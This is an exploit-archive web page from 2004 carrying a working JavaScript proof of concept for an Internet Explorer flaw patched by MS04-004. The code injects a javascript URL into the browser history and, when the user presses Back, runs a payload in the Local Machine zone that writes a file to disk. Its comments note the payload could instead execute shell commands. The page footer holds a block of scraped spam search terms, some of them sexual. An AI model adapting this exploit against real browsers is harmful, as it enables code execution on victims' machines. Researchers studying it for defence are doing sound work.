about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Internet Explorer url javascript injection in history list (MS04-004)



2004-02-04 Microsoft Internet Explorer url javascript injection in history list (MS04-004)
// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name: payload
// Purpose: Run payload code called from Local Machine zone.
// The code may be arbitrary such as executing shell commands. 
// This demo simply creates a harmless textfile on the desktop.
function payload() {
 file = "sandblad.txt";
 o = new ActiveXObject("ADODB.Stream");
 o.Open();
 o.Type=2;
 o.Charset="ascii";
 o.WriteText("You are vulnerable!");
 o.SaveToFile(file, 2);
 o.Close();
 alert("File "+file+" created on desktop!");
}

// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
 if (history.length != len)
 payload();
 else
 return "<title>-</title><body
onload=external.NavigateAndFind('res:','','')>";
}

// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
 location = 'javascript:'+trigger+payload+'trigger('+history.length+')';
}

// Launch backbutton exploit on load
if (confirm("Press OK to run backbutton exploit!"))
 backbutton();
securitydot.net - 2004-02-04

Advertising

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 13:04:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
n...ig_abs adegan sex Linux vers vedeo porn www.opdir. Tamil sex wx.18yearo www.taobao WWW INDIA uncapper C/r/n2199/ search/exp wwwtrishas www.taobao www.jibing artbanners Www.sexymo &ccedi sexy aunti Tamil actr PHP wamp 2.1.1 SHOPADMIN angelina j www.700xxx www.bizran 15eyarsex WWW.SIX300 www.zql.yn www.youtub shop dbtes amrita rao www.zhibei www.bjbm.o www.shwbw. sexy+india amirecan xxx movise cormazc@el Japan saxy www.brothe www.zhibei amember Global.htm www.zhibei Phon eroti SIMRAN SEX naked bbw adult18+ Zoophilie